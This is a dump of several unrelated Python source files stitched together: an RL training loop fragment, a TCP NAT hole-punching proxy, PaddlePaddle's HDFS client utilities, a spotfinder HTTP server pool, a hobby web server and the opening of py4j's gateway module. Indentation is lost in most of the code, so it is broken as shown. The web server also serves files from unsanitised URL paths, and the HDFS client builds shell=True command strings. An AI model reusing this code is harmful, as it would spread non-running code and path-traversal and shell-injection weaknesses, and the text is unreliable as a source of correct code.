episode_summary = tf.Summary(value=[
tf.Summary.Value(tag='rl/reward', simple_value=total_episode_rewards[e]),
tf.Summary.Value(tag='rl/episode_length', simple_value=emulator_steps[e]),
])
self.summary_writer.add_summary(episode_summary, self.global_step)
self.summary_writer.flush()
total_episode_rewards[e] = 0
emulator_steps[e] = 0
actions_sum[e] = np.zeros(self.num_actions)
states[-1] = shared_states
self.send_batch_queue.put([states, rewards, episodes_over_masks, actions, values])
# states: (5,32,84,84,4), rewards: (5,32), over: (5,32), actions: (5,32,6)
counter += 1
if counter % (2048 // self.emulator_counts) == 0:
curr_time = time.time()
global_steps = self.global_step
last_ten = 0.0 if len(total_rewards) < 1 else np.mean(total_rewards[-10:])
logging.info("Ran {} steps, at {} steps/s ({} steps/s avg), last 10 rewards avg {}"
.format(global_steps,
self.max_local_steps * self.emulator_counts / (curr_time - loop_start_time),
(global_steps - global_step_start) / (curr_time - start_time),
last_ten))
# Restore the network whenever the GPU learner has uploaded a new checkpoint.
try:
cur_ckpt = tf.train.latest_checkpoint(self.upload_checkpoint_folder)
if cur_ckpt and self.latest_ckpt != cur_ckpt:
self.network_saver.restore(self.session, cur_ckpt)
if os.path.exists("/root/D3RL_ZMQ_Vtrace/logs/upload/" + str(self.latest_ckpt) + ".meta"):
os.system(
"rm /root/D3RL_ZMQ_Vtrace/logs/upload/" + str(
self.latest_ckpt) + ".data-00000-of-00001")
os.system("rm /root/D3RL_ZMQ_Vtrace/logs/upload/" + str(self.latest_ckpt) + ".index")
os.system("rm /root/D3RL_ZMQ_Vtrace/logs/upload/" + str(self.latest_ckpt) + ".meta")
self.latest_ckpt = cur_ckpt
except ValueError:  # the checkpoint may still be mid-write; skip and retry on the next pass
pass
self.cleanup()
def cleanup(self):
super(PAACLearner, self).cleanup()
self.runners.stop()
self.flask_file_server_proc.terminate()
self.send_zmq_batch_data_proc.terminate()
|
tcp_client.py
|
#!/usr/bin/env python
from threading import Event, Thread
from util import *
import sys
import logging
import socket
import struct
logger = logging.getLogger('client')
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')
class TcpClient:
def __init__(self, stun_host, stun_port):
self.stun_host = stun_host
self.stun_port = stun_port
def accept(self, port):
logger.info("accept %s", port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.listen(1)
s.settimeout(5)
while not self.stop.is_set():
try:
conn, addr = s.accept()
except socket.timeout:
continue
else:
logger.info("Accept %s connected!", port)
return
def connect(self, local_addr, addr):
logger.info("connect from %s to %s", local_addr, addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(local_addr)
s.settimeout(2)
while not self.stop.is_set():
try:
s.connect(addr)
except socket.timeout:
continue
except socket.error:
continue
logger.info("connected from %s to %s success!", local_addr, addr)
self.stop.set()
return s
def tcp_punch(self):
self.stop = Event()
sa = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sa.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sa.connect((self.stun_host, self.stun_port))
priv_addr = sa.getsockname()
send_msg(sa, addr_to_msg(priv_addr))
data = recv_msg(sa)
logger.info("client %s %s - received data: %s", priv_addr[0], priv_addr[1], data)
pub_addr = msg_to_addr(data)
send_msg(sa, addr_to_msg(pub_addr))
data = recv_msg(sa)
pubdata, privdata = data.split(b'|')
client_pub_addr = msg_to_addr(pubdata)
client_priv_addr = msg_to_addr(privdata)
logger.info(
"client public is %s and private is %s, peer public is %s private is %s",
pub_addr, priv_addr, client_pub_addr, client_priv_addr,
)
try:
accept_thread = Thread(target=TcpClient.accept, args=(self, client_pub_addr[1],))
accept_thread.start()
return self.connect(priv_addr, client_pub_addr)
finally:
accept_thread.join()
def sending_worker(self, a, b):
try:
while True:
try:
data = a.recv(4096)
except socket.timeout:
if self.stop.is_set():
return
continue
if not data:
break
b.sendall(data)
except Exception as e:
print('Exception', e)
finally:
self.stop.set()
def proxy(self, s1, s2):
self.stop = Event()
t1 = Thread(target=TcpClient.sending_worker, args=(self, s2, s1))
t2 = Thread(target=TcpClient.sending_worker, args=(self, s1, s2))
t1.start()
t2.start()
t1.join()
t2.join()
s1.close()
s2.close()
def start_client(self, ip, port):
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.bind((ip, port))
client_sock.listen()
try:
while True:
print('awaiting connection on', ip, port)
client_conn, addr = client_sock.accept()
client_conn.settimeout(2)
print('>>>>> received local connection', addr)
server_sock = self.tcp_punch()
server_sock.send(b'\0')
print(server_sock.recv(1))
self.proxy(client_conn, server_sock)
finally:
client_sock.close()
def start_server(self, ip, port):
while True:
client_sock = self.tcp_punch()
client_sock.send(b'\0')
print(client_sock.recv(1))
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.settimeout(2)
server_sock.connect((ip, port))
self.proxy(client_sock, server_sock)
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
c = TcpClient(*addr_from_args(sys.argv[1:]))
if sys.argv[1] == 'client':
c.start_client('localhost', 12345)
elif sys.argv[1] == 'server':
c.start_server('localhost', 12345)
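# Illustrative sketch (hypothetical, not the project's actual util module): the
# helpers imported from util above are assumed to do simple length-prefixed
# framing and "ip:port" text encoding, roughly as below. The real
# implementations may differ.
import struct

def send_msg(sock, msg):
    # Prefix each message with its length as a 4-byte big-endian integer.
    sock.sendall(struct.pack('>I', len(msg)) + msg)

def recv_msg(sock):
    # Read the 4-byte length prefix, then exactly that many payload bytes.
    (msg_len,) = struct.unpack('>I', _recv_exact(sock, 4))
    return _recv_exact(sock, msg_len)

def _recv_exact(sock, n):
    data = b''
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError('socket closed while reading')
        data += chunk
    return data

def addr_to_msg(addr):
    # ('1.2.3.4', 5678) -> b'1.2.3.4:5678'
    return '{}:{}'.format(addr[0], addr[1]).encode()

def msg_to_addr(data):
    ip, port = data.decode().strip().split(':')
    return ip, int(port)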
|
hdfs_utils.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""hdfs_utils.py will move to fluid/incubate/fleet/utils/hdfs.py"""
import os
import sys
import subprocess
import multiprocessing
from datetime import datetime
import re
import copy
import errno
import logging
from paddle.fluid.log_helper import get_logger
__all__ = ["HDFSClient", "multi_download", "multi_upload"]
_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class HDFSClient(object):
"""
A tool of HDFS
Args:
hadoop_home (string): hadoop_home
configs (dict): hadoop config, it is a dict, please contain \
key "fs.default.name" and "hadoop.job.ugi"
Can be a float value
Examples:
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
"""
def __init__(self, hadoop_home, configs):
self.pre_commands = []
hadoop_bin = '%s/bin/hadoop' % hadoop_home
self.pre_commands.append(hadoop_bin)
dfs = 'fs'
self.pre_commands.append(dfs)
for k, v in configs.items():
config_command = '-D%s=%s' % (k, v)
self.pre_commands.append(config_command)
def __run_hdfs_cmd(self, commands, retry_times=5):
whole_commands = copy.deepcopy(self.pre_commands)
whole_commands.extend(commands)
print('Running system command: {0}'.format(' '.join(whole_commands)))
ret_code = 0
ret_out = None
ret_err = None
whole_commands = " ".join(whole_commands)
for x in range(retry_times + 1):
proc = subprocess.Popen(
whole_commands,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
(output, errors) = proc.communicate()
ret_code, ret_out, ret_err = proc.returncode, output, errors
if ret_code:
                _logger.warning(
                    'Times: %d, Error running command: %s. Return code: %d, Error: %s'
                    % (x, whole_commands, proc.returncode, errors))
else:
break
return ret_code, ret_out, ret_err
def upload(self, hdfs_path, local_path, overwrite=False, retry_times=5):
"""
upload the local file to hdfs
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
retry_times(int|5): retry times
Returns:
True or False
"""
assert hdfs_path is not None
assert local_path is not None and os.path.exists(local_path)
if os.path.isdir(local_path):
            _logger.warning(
                "The local path {} is a directory; uploading directories is not supported yet".
                format(local_path))
            return False
base = os.path.basename(local_path)
if not self.is_exist(hdfs_path):
self.makedirs(hdfs_path)
else:
if self.is_exist(os.path.join(hdfs_path, base)):
                if overwrite:
                    _logger.info(
                        "The HDFS path {} already exists and overwrite=True; deleting it".
                        format(hdfs_path))
                    self.delete(hdfs_path)
                else:
                    _logger.error(
                        "The HDFS path {} already exists and overwrite=False; returning".
                        format(hdfs_path))
return False
put_commands = ["-put", local_path, hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(put_commands,
retry_times)
if returncode:
_logger.error("Put local path: {} to HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Put local path: {} to HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def download(self, hdfs_path, local_path, overwrite=False, unzip=False):
"""
download file from HDFS
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
unzip(bool|False): if the download file is compressed by zip, unzip it or not.
Returns:
True or False
"""
        _logger.info('Downloading %r to %r.', hdfs_path, local_path)
if not self.is_exist(hdfs_path):
print("HDFS path: {} do not exist".format(hdfs_path))
return False
        if self.is_dir(hdfs_path):
            _logger.error(
                "The HDFS path {} is a directory; downloading directories is not supported yet".
                format(hdfs_path))
            return False
if os.path.exists(local_path):
base = os.path.basename(hdfs_path)
local_file = os.path.join(local_path, base)
if os.path.exists(local_file):
if overwrite:
os.remove(local_file)
else:
_logger.error(
"The Local path: {} is exist and overwrite is False, return".
format(local_file))
return False
self.make_local_dirs(local_path)
download_commands = ["-get", hdfs_path, local_path]
returncode, output, errors = self.__run_hdfs_cmd(download_commands)
if returncode:
_logger.error("Get local path: {} from HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Get local path: {} from HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def is_exist(self, hdfs_path=None):
"""
whether the remote HDFS path exists
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
exist_cmd = ['-test', '-e', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
exist_cmd, retry_times=1)
if returncode:
_logger.error("HDFS is_exist HDFS path: {} failed".format(
hdfs_path))
return False
else:
_logger.info("HDFS is_exist HDFS path: {} successfully".format(
hdfs_path))
return True
def is_dir(self, hdfs_path=None):
"""
whether the remote HDFS path is directory
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
if not self.is_exist(hdfs_path):
return False
dir_cmd = ['-test', '-d', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(dir_cmd, retry_times=1)
if returncode:
_logger.error("HDFS path: {} failed is not a directory".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} successfully is a directory".format(
hdfs_path))
return True
def delete(self, hdfs_path):
"""
Remove a file or directory from HDFS.
Args:
hdfs_path: HDFS path.
Returns:
True or False
This function returns `True` if the deletion was successful and `False` if
no file or directory previously existed at `hdfs_path`.
"""
_logger.info('Deleting %r.', hdfs_path)
if not self.is_exist(hdfs_path):
_logger.warn("HDFS path: {} do not exist".format(hdfs_path))
return True
if self.is_dir(hdfs_path):
del_cmd = ['-rmr', hdfs_path]
else:
del_cmd = ['-rm', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(del_cmd, retry_times=0)
if returncode:
_logger.error("HDFS path: {} delete files failure".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} delete files successfully".format(
hdfs_path))
return True
def rename(self, hdfs_src_path, hdfs_dst_path, overwrite=False):
"""
Move a file or folder on HDFS.
Args:
            hdfs_src_path(str): HDFS source path.
            hdfs_dst_path(str): HDFS destination path.
overwrite(bool|False): If the path already exists and overwrite is False, will return False.
Returns:
True or False
"""
assert hdfs_src_path is not None
assert hdfs_dst_path is not None
        if not self.is_exist(hdfs_src_path):
            _logger.info("HDFS source path does not exist: {}".format(
                hdfs_src_path))
        if self.is_exist(hdfs_dst_path) and not overwrite:
            _logger.error("HDFS destination path {} exists and overwrite=False".
                          format(hdfs_dst_path))
            return False
rename_command = ['-mv', hdfs_src_path, hdfs_dst_path]
returncode, output, errors = self.__run_hdfs_cmd(
rename_command, retry_times=1)
if returncode:
_logger.error("HDFS rename path: {} to {} failed".format(
hdfs_src_path, hdfs_dst_path))
return False
else:
_logger.info("HDFS rename path: {} to {} successfully".format(
hdfs_src_path, hdfs_dst_path))
return True
@staticmethod
def make_local_dirs(local_path):
"""
        Create a local directory, similar to mkdir -p.
        Args:
            local_path: the local path of the directory to create.
"""
try:
os.makedirs(local_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def makedirs(self, hdfs_path):
"""
Create a remote directory, recursively if necessary.
Args:
hdfs_path(str): Remote path. Intermediate directories will be created appropriately.
Returns:
True or False
"""
_logger.info('Creating directories to %r.', hdfs_path)
assert hdfs_path is not None
if self.is_exist(hdfs_path):
_logger.error("HDFS path is exist: {}".format(hdfs_path))
return
mkdirs_commands = ['-mkdir', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
mkdirs_commands, retry_times=1)
if returncode:
_logger.error("HDFS mkdir path: {} failed".format(hdfs_path))
return False
else:
_logger.error("HDFS mkdir path: {} successfully".format(hdfs_path))
return True
def ls(self, hdfs_path):
"""
        List the directory contents of the HDFS path.
Args:
hdfs_path(str): Remote HDFS path will be ls.
Returns:
List: a contents list about hdfs_path.
"""
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-ls', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list path: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list path: {} successfully".format(hdfs_path))
ret_lines = []
            regex = re.compile(r'\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
ret_lines.append(re_line[7])
return ret_lines
def lsr(self, hdfs_path, only_file=True, sort=True):
"""
        Recursively list the directory contents of the HDFS path.
Args:
hdfs_path(str): Remote HDFS path.
only_file(bool|True): will discard folders.
sort(bool|True): will be sorted by create time.
Returns:
List: a contents list about hdfs_path.
"""
        def sort_by_time(entry):
            # Key function: entries are (path, "create time") tuples.
            return datetime.strptime(entry[1], '%Y-%m-%d %H:%M')
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-lsr', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list all files: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list all files: {} successfully".format(
hdfs_path))
lines = []
            regex = re.compile(r'\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
if only_file and re_line[0][0] == "d":
continue
else:
lines.append(
(re_line[7], re_line[5] + " " + re_line[6]))
            if sort:
                lines.sort(key=sort_by_time)
ret_lines = [ret[0] for ret in lines]
return ret_lines
def multi_download(client,
hdfs_path,
local_path,
trainer_id,
trainers,
multi_processes=5):
"""
Download files from HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
trainer_id(int): current trainer id
trainers(int): all trainers number
        multi_processes(int|5): the number of download processes running at the same time, default=5
Returns:
List:
Download files in local folder.
"""
def __subprocess_download(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
sub_local_re_path = local_path
else:
sub_local_re_path = os.path.join(local_path, re_path)
client.download(data, sub_local_re_path)
assert isinstance(client, HDFSClient)
client.make_local_dirs(local_path)
_logger.info("Make local dir {} successfully".format(local_path))
all_need_download = client.lsr(hdfs_path, sort=True)
need_download = all_need_download[trainer_id::trainers]
_logger.info("Get {} files From all {} files need to be download from {}".
format(len(need_download), len(all_need_download), hdfs_path))
_logger.info("Start {} multi process to download datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = need_download[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_download, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to download datas".format(
multi_processes))
local_downloads = []
for data in need_download:
data_name = os.path.basename(data)
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
local_re_path = os.path.join(local_path, data_name)
else:
local_re_path = os.path.join(local_path, re_path, data_name)
local_downloads.append(local_re_path)
return local_downloads
def getfilelist(path):
rlist = []
for dir, folder, file in os.walk(path):
for i in file:
t = os.path.join(dir, i)
rlist.append(t)
for r in rlist:
print(r)
def multi_upload(client,
hdfs_path,
local_path,
multi_processes=5,
overwrite=False,
sync=True):
"""
Upload files to HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
        multi_processes(int|5): the number of upload processes running at the same time, default=5
overwrite(bool|False): will overwrite file on HDFS or not
sync(bool|True): upload files sync or not.
Returns:
None
"""
def __subprocess_upload(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), local_path)
hdfs_re_path = os.path.join(hdfs_path, re_path)
client.upload(hdfs_re_path, data, overwrite, retry_times=5)
def get_local_files(path):
rlist = []
if not os.path.isdir(path):
return rlist
for dirname, folder, files in os.walk(path):
for i in files:
t = os.path.join(dirname, i)
rlist.append(t)
return rlist
assert isinstance(client, HDFSClient)
all_files = get_local_files(local_path)
if not all_files:
_logger.info("there are nothing need to upload, exit")
return
_logger.info("Start {} multi process to upload datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = all_files[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_upload, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to upload datas".format(
multi_processes))
if __name__ == "__main__":
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
    downloads = multi_download(
        client,
        "/user/com/train-25/model",
        "/home/xx/data1",
        1,
        5,
        multi_processes=5)
multi_upload(client, "/user/com/train-25/model", "/home/xx/data1")
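# Illustrative sketch (not part of the original module): how multi_download
# shards work, first across trainers and then across worker processes, using
# the same stride slicing as the functions above. The file names are made up
# for the example.
def demo_sharding():
    all_files = ["part-{:05d}".format(i) for i in range(10)]
    trainer_id, trainers, n_proc = 1, 2, 3
    # Each trainer takes every `trainers`-th file, starting at its own id.
    need_download = all_files[trainer_id::trainers]
    # Each worker process then takes every `n_proc`-th file of that subset.
    per_process = [need_download[i::n_proc] for i in range(n_proc)]
    return need_download, per_process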
|
mp_spotfinder_server_read_file.py
|
from __future__ import absolute_import, division, print_function
from BaseHTTPServer import HTTPServer
import cgi, sys
from multiprocessing import Process, current_process
from urlparse import urlparse
from six.moves import range
#backward compatibility with Python 2.5
try: from urlparse import parse_qs
except Exception: from cgi import parse_qs
def note(format, *args):
sys.stderr.write('[%s]\t%s\n' % (current_process().name, format%args))
from spotfinder.servers.spotfinder_server_read_file import image_request_handler as irhbase
from spotfinder.servers.spotfinder_server_read_file import generate_common_parameters # import dependency
class image_request_handler(irhbase):
def log_message(self, format, *args):
note(format, *args)
def serve_forever(server):
note('starting server')
try:
server.serve_forever()
except KeyboardInterrupt:
pass
def runpool(address, number_of_processes,handler):
# create a single server object -- children will each inherit a copy
server = HTTPServer(address, handler)
# create child processes to act as workers
for i in range(number_of_processes-1):
Process(target=serve_forever, args=(server,)).start()
# main process also acts as a worker
serve_forever(server)
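# Illustrative sketch (an assumption, not part of spotfinder): the same pre-fork
# pattern written against the Python 3 standard library, since the imports above
# (BaseHTTPServer, urlparse) are Python 2 only. A single HTTPServer is created
# before forking so every worker process inherits the listening socket; like the
# original, this relies on fork-based process creation.
from http.server import HTTPServer, BaseHTTPRequestHandler
from multiprocessing import Process

def runpool_py3(address, number_of_processes, handler=BaseHTTPRequestHandler):
    server = HTTPServer(address, handler)
    for _ in range(number_of_processes - 1):
        Process(target=server.serve_forever).start()
    server.serve_forever()  # the main process also acts as a worker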
|
web_server.py
|
# Sincroniza Web App - By João Lucas | Developed as a requirement for the Mostra Científica (science fair)
import socket
import threading
from utils import *
from urllib.parse import unquote
from python_parser import pythonfier
content_dir = "web/"
class WebServer(object):
def __init__(self, port):
self.port = port
self.host = socket.gethostbyname(socket.gethostname())
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def _headers(self, status, cookie=""):
preset = f"\nServer: Sincroniza\nConnection: close\n\n"
if cookie != "":
preset = f"\nServer: Sincroniza\nConnection: close\n{cookie}\n\n"
if status == 200:
header = "HTTP/1.1 200 Response OK" + preset
elif status == 401:
header = "HTTP/1.1 400 Not Authorized." + preset
elif status == 403:
header = "HTTP/1.1 403 Permissions Required." + preset
elif status == 404:
header = "HTTP/1.1 404 Not Found." + preset
else:
header = "HTTP/1.1 500 Server Could Not Process the Request." + preset
return header
def _request_handler(self, type, body, addr):
cookies = ""
vars = {"cookies": {}, "url_params": {}, "ip": addr}
for line in body.split("\n"):
if line.startswith("Cookie:"):
cook = line[8:].split("; ")
                for cokizinho in cook:
                    if cokizinho.endswith("\r"):
                        vars["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1][:-1]})
                    else:
                        vars["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1]})
file = body.split(" ")[1].split("?")[0]
try:
for param in body.split(" ")[1].split("?")[1].split("&"):
vars["url_params"].update({param.split("=")[0]: param.split("=")[1]})
except:
pass
file = content_dir + file
if type in ["GET", "HEAD"]:
if file == content_dir + "/": file = content_dir + "index.html"
try:
file_contents = htmlfy(open(file, "rb").read())
if file.endswith(".html"): cookies, file_contents = pythonfier(file_contents.decode(), vars)
return self._headers(200, cookies).encode() + file_contents
except FileNotFoundError:
return self._headers(
404).encode() + b"<html><head><title>UC | 404</title></head><body><center><h1>Erro 404</h1></center></body></html>"
except OSError:
return self._headers(403).encode() + htmlfy(
f"<html><head><title>UC | 403</title></head><body><center><h1>Erro 403</h1><br><p>Esta página é restrita.</p></center></body></html>").encode()
except Exception as e:
return self._headers(500).encode() + htmlfy(
f"<html><head><title>UC | 500</title></head><body><center><h1>Erro 500</h1><br><p>Um erro occoreu no servidor. detalhes:<br>{e}</p></center></body></html>").encode()
elif type == "POST":
values = {"cookies": {}, "ip": addr}
for line in body.split("\n"):
if line.startswith("Cookie:"):
cook = line[8:].split("; ")
for cokizinho in cook:
if cokizinho.endswith("\r"):
values["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1][:-1]})
else:
values["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1]})
try:
for value in unquote(body.split("\n")[-1]).split("&"):
values.update({value.split("=")[0]: value.split("=")[1]})
except Exception as e:
print(e)
if file == content_dir + "/": file = content_dir + "index.html"
try:
file_contents = htmlfy(open(file, "rb").read())
if file.endswith(".html"): cookies, file_contents = pythonfier(file_contents.decode("utf-8"), values)
return self._headers(200, cookies).encode() + file_contents
except FileNotFoundError:
return self._headers(
404).encode() + b"<html><head><title>UC | 404</title></head><body><center><h1>Erro 404</h1></center></body></html>"
except OSError:
                return self._headers(403).encode() + htmlfy(
                    f"<html><head><title>UC | 403</title></head><body><center><h1>Erro 403</h1><br><p>Esta página é restrita.</p></center></body></html>").encode()
            except Exception as e:
                return self._headers(500).encode() + htmlfy(
                    f"<html><head><title>UC | 500</title></head><body><center><h1>Erro 500</h1><br><p>Um erro occoreu no servidor. detalhes:<br>{e}</p></center></body></html>").encode()
return self._headers(200).encode() + body.encode()
def _handler(self, client, addr):
while True:
data = client.recv(1000024)
if not data: break
try:
data = data.decode('utf-8')
except Exception as e:
print("[WEB] Unknown")
client.close()
break
method = data.split(" ")[0]
response = self._request_handler(method, data, addr[0])
client.send(response)
client.close()
break
def start(self):
try:
print(f"[WEB] Binding to {self.host}:{self.port}")
self.socket.bind((self.host, self.port))
print("[WEB] Binded.")
except Exception as e:
self.socket.close()
print(f"[WEB] Failed to bind. {e}")
exit()
self._listener()
def _listener(self):
self.socket.listen(5)
while True:
(client, addr) = self.socket.accept()
client.settimeout(60)
print(f"[WEB] Recieved incoming connection. {addr}")
print("[WEB] Starting Handler Thread")
threading.Thread(target=self._handler, args=(client, addr)).start()
print("[LOG] Hello from Jão!")
while True:
print("[LOG] Starting WEB")
WebServer(80).start()
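# Illustrative sketch (not part of the server): what the cookie / URL-parameter
# parsing in _request_handler produces for a raw GET request. The request text
# below is made up for the example.
def demo_parse():
    raw = ("GET /index.html?user=joao&lang=pt HTTP/1.1\n"
           "Host: example\n"
           "Cookie: session=abc123; theme=dark\r\n")
    parsed = {"cookies": {}, "url_params": {}}
    for line in raw.split("\n"):
        if line.startswith("Cookie:"):
            for piece in line[8:].split("; "):
                name, value = piece.split("=")
                parsed["cookies"][name] = value.rstrip("\r")
    for param in raw.split(" ")[1].split("?")[1].split("&"):
        name, value = param.split("=")
        parsed["url_params"][name] = value
    # -> {'cookies': {'session': 'abc123', 'theme': 'dark'},
    #     'url_params': {'user': 'joao', 'lang': 'pt'}}
    return parsed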
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java naming conventions do not recommend starting identifiers with an
underscore, so clashes are unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = {"yes", "y", "t", "true"}
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
"""Ensures that the child process is created in another process group.
This prevents signals such as SIGINT from propagating to the JVM.
"""
if os.name != "nt":
kwargs = {"preexec_fn": os.setpgrp}
else:
kwargs = {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
return kwargs
def set_reuse_address(server_socket):
"""Sets reuse address option if not on windows.
On windows, the SO_REUSEADDR option means that multiple server sockets can
be bound to the same address (it has nothing to do with TIME_WAIT).
"""
if os.name != "nt":
server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
"""Sets default accept timeout of callback server.
"""
deprecated("set_default_callback_accept_timeout", "1.0",
"CallbackServerParameters")
global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
